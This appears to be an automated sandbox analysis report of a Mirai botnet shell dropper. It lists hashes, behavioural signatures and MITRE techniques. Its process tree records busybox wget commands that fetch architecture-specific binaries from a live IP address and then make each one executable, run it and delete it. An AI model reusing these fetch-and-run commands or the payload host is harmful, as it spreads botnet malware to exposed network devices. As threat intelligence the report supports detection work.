Analysis
-
max time kernel
150s -
max time network
151s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
18-02-2025 03:33
General
-
Target
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh
-
Size
1KB
-
MD5
d011eee1c3ee60b1a1db3ae1e9e65ad6
-
SHA1
18f4cee16484157375f8bbcf21acca220a258d66
-
SHA256
dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa
-
SHA512
ed73548c60e65449f31d4bc5ca644d2f59e72d0843a24b3236707338fbed8e26ed608897d0c5a26a971357e7d28b92a9ecb6d8d76d5f7d55e93bf0aa3dd3f6ac
Malware Config
Extracted
mirai
BOTNET
Extracted
mirai
BOTNET
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (176180) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 7 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Renames itself 1 IoCs
-
Unexpected DNS network traffic destination 25 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Enumerates active TCP sockets 1 TTPs 1 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads process memory 1 TTPs 51 IoCs
Read the memory of a process through the /proc virtual filesystem. This can be used to steal credentials.
-
Changes its process name 1 IoCs
-
Reads system network configuration 1 TTPs 1 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 7 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh/tmp/dd5851b5ab04287b30ed4d1bed6f7940d256849c8d6cfc9936df59afa4c328aa.sh1⤵
- Executes dropped EXE
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm -O jklarm2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm./jklarm exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm5 -O jklarm52⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm52⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm5./jklarm5 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm52⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm6 -O jklarm62⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm62⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm6./jklarm6 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm62⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarm7 -O jklarm72⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklarm72⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarm7./jklarm7 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarm72⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklm68k -O jklm68k2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklm68k2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklm68k./jklm68k exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklm68k2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmips -O jklmips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklmips2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmips./jklmips exploit2⤵
- Deletes itself
- Modifies Watchdog functionality
- Renames itself
- Enumerates active TCP sockets
- Reads process memory
- Changes its process name
- Reads system network configuration
- Reads runtime system information
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox rm -rf jklmips2⤵
- System Network Configuration Discovery
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklmpsl -O jklmpsl2⤵
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox chmod +x jklmpsl2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklmpsl./jklmpsl exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklmpsl2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklppc -O jklppc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklppc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklppc./jklppc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklppc2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklsh4 -O jklsh42⤵
-
-
/bin/busybox/bin/busybox chmod +x jklsh42⤵
- File and Directory Permissions Modification
-
-
/tmp/jklsh4./jklsh4 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklsh42⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklspc -O jklspc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklspc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklspc./jklspc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklspc2⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklx86 -O jklx862⤵
-
-
/bin/busybox/bin/busybox chmod +x jklx862⤵
- File and Directory Permissions Modification
-
-
/tmp/jklx86./jklx86 exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklx862⤵
-
-
/bin/busybox/bin/busybox wget http://193.143.1.32/jklarc -O jklarc2⤵
-
-
/bin/busybox/bin/busybox chmod +x jklarc2⤵
- File and Directory Permissions Modification
-
-
/tmp/jklarc./jklarc exploit2⤵
-
-
/bin/busybox/bin/busybox rm -rf jklarc2⤵
-
-
/bin/busybox/bin/busybox rm -rf wget.sh2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
54KB
MD560323049a9468c264a9535600a053b6e
SHA1960ec393b1590fee232414d8d8f279b189573b6f
SHA2563ac4757c406bac2bedd2771c5c137607e2788099782ca939cb40c32aa2c71343
SHA512e1e33d7bf40b34e4a90a88b2ada4822dc150ae705ae118f2a169f1dc427a4bad4fcc6a0e3e668483024395ae9005d2bef1ac82952774b359063dbc6f32e44954
-
Filesize
54KB
MD5368f814e3fcc026df077492406916cfb
SHA194a499401b79d75a6c1df3eb205dc44057425f5b
SHA2564cb919fe578f5a95e86157987898bb2959019260992578f42e7abd79f3d864ce
SHA512e334932543ea5bead5ea96f13191f967e63893b92ffa2fe6793afe5d39615f46c2b62ab4ff8846f78cffeb32dd51ae6a88ba36dd59cab8da75a1cbd0f1b842cc
-
Filesize
65KB
MD53efe981dfb09404a90020f31b91a0d99
SHA175dad217f8faab13473fa87f1f90cfab16646e67
SHA256b0200c4648356ccc6af1711e1673c133c8f785611b10d49f925958507bb8b213
SHA5126f5068a4d9fa7e6db711cb6207a3316a24d58d68e6996e211d6a10ac5eee3b67adbd8677d7f4061eac2476b5596c9c767055ab3a19bcf569137c7ca3ed8177fc
-
Filesize
77KB
MD582feacfdba7096dd1f30ae81b443ed99
SHA11ffc5f931d6bbf76e3ae065033fc5cb95a9e8a33
SHA256dec770c2901a222ec48915adfe1f7c6091fc3e9b03941a53f44b21593af862d2
SHA51207f59c67b2c32911d031816713ad9bcd36f2b3beaf9c7645c1d3b73fc29fb2d09aef648a08fd6f83037bf3731d287babcfc7c228fac7af465bc79ad325477c9d
-
Filesize
55KB
MD50e6cf4992f8f2394394ca5972339a663
SHA1acd7245a3e7b0f394100658336e10aaa2774771d
SHA25630c5e7b561a3e61ab67af8181fd6b996258325bf8137531ffe9d2b3f438a3d46
SHA51266f9c4f37e8c039a2b435a213629992a88b15609f3d449b1552a5aade52981d8679b1f949b35d9edfc2522a2c5acd4efbb4ed55b64ec08d55818205b8cc78c10
-
Filesize
70KB
MD59f505111a75f65954723020bee516bc1
SHA10aa2fbd97682553fcfd5a6494e09498c04df96b3
SHA2565e2d9f9531aff471dd5d92b772c57ba66cfb39aefef46fb878f3d30db9a8c1c8
SHA51266fe3d79c76e4c773b6512f90ed9b3dd60cba157882a8093931c60c5771191c1c8442ee96121fb9e578056dfa91a6878f4271e1e2e02fdd4c73d50e33ceac640
-
Filesize
74KB
MD5e21d64812567d5607c06f765f06b40c2
SHA1c05d80301c864dbc3b4176406fb2e33870f916ed
SHA2563132f0d33ba9fc64e8258e2094745f4fe60d4f044b5b8fe0aef5e311d9e0adaf
SHA51230a3416d773cb0bc0f68a8198e860d31c0c9e860f43338ba4dcb2fc2ccfa254ddf9b390ead160935235db6a7509f1caaea2c8b148743e400591c764ec3e5e9e5